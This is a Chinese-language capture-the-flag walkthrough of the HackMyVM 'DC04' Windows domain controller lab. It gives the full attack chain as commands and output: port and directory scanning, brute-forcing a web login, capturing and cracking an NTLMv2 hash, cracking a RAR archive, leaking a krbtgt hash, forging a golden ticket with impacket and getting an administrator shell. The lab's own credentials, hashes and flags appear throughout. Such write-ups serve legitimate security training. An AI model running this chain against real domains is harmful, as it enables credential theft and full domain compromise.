38.DC04
1. 基本信息^toc
- 1. 基本信息
- 2. 信息收集
- 3. websvc用户
- 4. rtina97用户
- 5. 黄金票据
- 5.1. 利用条件
- 5.2. 获取域SID
- 5.3. 同步域时间
- 5.4. 生成管理员的黄金票据
- 5.5. 导入票据到环境变量
- 5.6. PTT
靶机链接
作者
难度 ⭐️⭐️⭐️⭐️⭐️
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[/home/kali/hmv/dc04]
└─# fscan -h 192.168.69.4
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _`' |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.69.4:139 open
192.168.69.4:80 open
192.168.69.4:135 open
192.168.69.4:445 open
192.168.69.4:88 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 192.168.69.4 [+] DC:SOUPEDECODE\DC01
[*] NetInfo
[*]192.168.69.4
[->]DC01
[->]192.168.69.4
[*] WebTitle http://192.168.69.4 code:302 len:0 title:None 跳转url: http://soupedecode.local
已完成 5/5
[*] 扫描结束,耗时: 3.264268642s
┌──(root㉿kali)-[/home/kali/hmv/dc04]
└─# nmap -sCV 192.168.69.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 23:13 CST
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 23:13 (0:00:00 remaining)
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 23:13 (0:00:00 remaining)
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 23:13 (0:00:00 remaining)
Nmap scan report for 192.168.69.4
Host is up (0.00027s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://soupedecode.local
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-05 07:13:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
MAC Address: 08:00:27:13:99:85 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 15h59m57s
| smb2-time:
| date: 2024-12-05T07:13:38
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:13:99:85 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.93 seconds
配置hsots
192.168.56.126 soupedecode.local DC01.soupedecode.local
2.2. 目录扫描
[01:20:17] 200 - 10KB - /server-status/
[01:20:17] 200 - 10KB - /server-status
[01:20:18] 200 - 100KB - /server-info
用dirsearch可以扫出来三个路径
访问后里面可以找到一个子域名 heartbeat.soupedecode.local 添加到hosts里面
2.3. 网址利用
访问后可以发现是一个登录框
利用burp进行爆破一下
这个机子很垃圾,爆破了几下就出问题了。后面怎么都爆破都是403了。重启也没有用,只能重新安装了
建议还是启动了就保存一下快照
最后报出来账号密码是 admin:nimda
登录成功后会要求你输入ip地址
3. websvc用户
3.1. NTLM中毒攻击
输入我们kali的ip然后进行监听
可以获取到一个NTLMhash
┌──(root㉿kali)-[/home]
└─# responder -I eth1
[SMB] NTLMv2-SSP Client : 192.168.56.126
[SMB] NTLMv2-SSP Username : soupedecode\websvc
[SMB] NTLMv2-SSP Hash : websvc::soupedecode:3d80cf0d5de8656a:911B4595F70D957A0671068267CDF165:010100000000000000F21251F450DB01006098D655A71BC1000000000200080054004E0039004B0001001E00570049004E002D0032003200470032004D003200310036004B004100340004003400570049004E002D0032003200470032004D003200310036004B00410034002E0054004E0039004B002E004C004F00430041004C000300140054004E0039004B002E004C004F00430041004C000500140054004E0039004B002E004C004F00430041004C000700080000F21251F450DB01060004000200000008003000300000000000000000000000004000007EB2E40733876D4CE24083BC1F55F4CD7B7D843B3B343F98128E45BD39583DFF0A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E00350036002E0035000000000000000000
破解hash
hashcat hash.txt rockyou.txt
WEBSVC::soupedecode:3d80cf0d5de8656a:911b4595f70d957a0671068267cdf165:010100000000000000f21251f450db01006098d655a71bc1000000000200080054004e0039004b0001001e00570049004e002d0032003200470032004d003200310036004b004100340004003400570049004e002d0032003200470032004d003200310036004b00410034002e0054004e0039004b002e004c004f00430041004c000300140054004e0039004b002e004c004f00430041004c000500140054004e0039004b002e004c004f00430041004c000700080000f21251f450db01060004000200000008003000300000000000000000000000004000007eb2e40733876d4ce24083bc1f55f4cd7b7d843b3b343f98128e45bd39583dff0a001000000000000000000000000000000000000900220063006900660073002f003100390032002e003100360038002e00350036002e0035000000000000000000:jordan23
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: WEBSVC::soupedecode:3d80cf0d5de8656a:911b4595f70d95...000000
Time.Started.....: Wed Dec 18 02:39:31 2024 (0 secs)
Time.Estimated...: Wed Dec 18 02:39:31 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: jordan23 [8]
Guess.Queue......: 350/14336793 (0.00%)
Speed.#1.........: 4949 H/s (0.00ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: jordan23 -> jordan23
Hardware.Mon.#1..: Util: 16%
Started: Wed Dec 18 02:38:56 2024
Stopped: Wed Dec 18 02:39:32 2024
获取到一对账号密码 WEBSVC :jordan23
3.2. smb探测
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u websvc -p jordan23 --shares
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\websvc:jordan23 STATUS_PASSWORD_EXPIRED
密码是对的 只是过期了。 上Vbox更新一下密码即可
我这里修改后的密码是 admin!@#45
重新检测一下
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u websvc -p 'admin!@#45' --shares
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [+] SOUPEDECODE.LOCAL\websvc:admin!@#45
SMB 192.168.56.126 445 DC01 [+] Enumerated shares
SMB 192.168.56.126 445 DC01 Share Permissions Remark
SMB 192.168.56.126 445 DC01 ----- ----------- ------
SMB 192.168.56.126 445 DC01 ADMIN$ Remote Admin
SMB 192.168.56.126 445 DC01 C READ
SMB 192.168.56.126 445 DC01 C$ Default share
SMB 192.168.56.126 445 DC01 IPC$ READ Remote IPC
SMB 192.168.56.126 445 DC01 NETLOGON READ Logon server share
SMB 192.168.56.126 445 DC01 SYSVOL READ Logon server share
在 websvc 用户下可以获取到userflag
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# cat user.txt
709e449a996a85aa7deaf18c79515d6a
而且也可以发现一些用户的目录
smb: \users\> ls
. DR 0 Wed Nov 6 20:55:53 2024
.. DHS 0 Tue Nov 5 18:30:29 2024
Administrator D 0 Sat Jun 15 15:56:40 2024
All Users DHSrn 0 Sat May 8 04:26:16 2021
Default DHR 0 Sat Jun 15 22:51:08 2024
Default User DHSrn 0 Sat May 8 04:26:16 2021
desktop.ini AHS 174 Sat May 8 04:14:03 2021
fjudy998 D 0 Wed Nov 6 20:55:33 2024
ojake987 D 0 Wed Nov 6 20:55:16 2024
Public DR 0 Sat Jun 15 13:54:32 2024
rtina979 D 0 Wed Nov 6 20:54:39 2024
websvc D 0 Wed Nov 6 20:44:11 2024
xursula991 D 0 Wed Nov 6 20:55:28 2024
这里面的用户我们需要着重关注。
rtina979
xursula991
fjudy998
4. rtina97用户
4.1. rpc获取用户信息
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# rpcclient -U websvc%'admin!@#45' 192.168.56.126 -c "querydispinfo" |grep -E 'rtina979|xursula991|fjudy998'
index: 0x1330 RID: 0x80e acb: 0x00020010 Account: fjudy998 Name: Felix Judy Desc: Music lover and aspiring guitarist
index: 0x131f RID: 0x7fd acb: 0x00020010 Account: rtina979 Name: Reed Tina Desc: Default Password Z~l3JhcV#7Q-1#M
index: 0x1329 RID: 0x807 acb: 0x00020010 Account: xursula991 Name: Ximena Ursula Desc: Yoga practitioner and meditation lover
获取到了 rtina979 用户的默认密码 Z~l3JhcV#7Q-1#M
检测一下是否可以使用
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u rtina979 -p 'Z~l3JhcV#7Q-1#M'
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\rtina979:Z~l3JhcV#7Q-1#M STATUS_PASSWORD_EXPIRED
可以使用。密码过期了 上Vbox修改一下即可
这里我修改新密码为 c1trus123
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u rtina979 -p 'c1trus123'
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [+] SOUPEDECODE.LOCAL\rtina979:c1trus123
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# smbmap -H 192.168.56.126 -u rtina979 -p c1trus123
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.56.126:445 Name: soupedecode.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections
在 rtina979 用户的 Documents 目录下可以获取到一个文件 Report.rar
smb: \users\rtina979\Documents\> ls
. DR 0 Thu Nov 7 17:35:52 2024
.. D 0 Wed Nov 6 20:54:39 2024
My Music DHSrn 0 Wed Nov 6 20:54:39 2024
My Pictures DHSrn 0 Wed Nov 6 20:54:39 2024
My Videos DHSrn 0 Wed Nov 6 20:54:39 2024
Report.rar A 712046 Thu Nov 7 08:35:49 2024
12942591 blocks of size 4096. 11014117 blocks available
smb: \users\rtina979\Documents\> get Report.rar
getting file \users\rtina979\Documents\Report.rar of size 712046 as Report.rar (11589.3 KiloBytes/sec) (average 11589.3 KiloBytes/sec)
4.2. 破解压缩包
此压缩包杯加密了 爆破一下
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# rar2john Report.rar
Created directory: /root/.john
Report.rar:$rar5$16$7b74f4c32feb807c16edc906c283e524$15$872f8d1a914bd1503dac110c7bbb938a$8$3e15430028d503b5
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# rar2john Report.rar >hash.txt
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (RAR5 [PBKDF2-SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PASSWORD123 (Report.rar)
1g 0:00:00:33 DONE (2024-12-19 02:26) 0.02944g/s 1515p/s 1515c/s 1515C/s ang123..2pac4ever
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
成功爆破出密码 PASSWORD123
4.3. 报告审计
解压后是一个渗透测试报告
在报告的最后可以获取到 krbtgt 的hash
5. 黄金票据
黄金票证是一种权限维持手段,攻击者获得了对Active Directory密钥分发服务帐户KRBTGT的控制权,并使用该帐户伪造有效的Kerberos票证授予票证TGT。这使攻击者能够访问Active Directory域上的任何资源,如果有KRBTGT哈希,您可以伪造自己的TGT,其中包括想要的任何组成员身份的PAC数据。
5.1. 利用条件
- 获取域中krbtgt用户使用的加密密钥 (这里已经获取到了krbtgt用户的NTLM hash)
- 目标域名 域SID
我们现在获取到了KRBTGT哈希 先验证一下是否是正确的
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u krbtgt -H '0f55cdc40bd8f5814587f7e6b2f85e6f'
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:0f55cdc40bd8f5814587f7e6b2f85e6f STATUS_ACCOUNT_DISABLED
很好是正确的
5.2. 获取域SID
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# impacket-lookupsid soupedecode.local/rtina979:c1trus123@192.168.56.126 |grep SID
[*] Brute forcing SIDs at 192.168.56.126
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
5.3. 同步域时间
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# rdate -n 192.168.56.126
Thu Dec 19 19:05:54 EST 2024
5.4. 生成管理员的黄金票据
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# impacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for soupedecode.local/administrator
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in administrator.ccache
5.5. 导入票据到环境变量
export KRB5CCNAME=administrator.ccache
5.6. PTT
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# impacket-wmiexec soupedecode.local/administrator@dc01.soupedecode.local -k -target-ip 192.168.56.126
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
C:\>id
'id' is not recognized as an internal or external command,
operable program or batch file.
C:\>whoami
soupedecode.local\administrator
C:\users\administrator\desktop>type root.txt
1c66eabe105636d7e0b82ec1fa87cb7a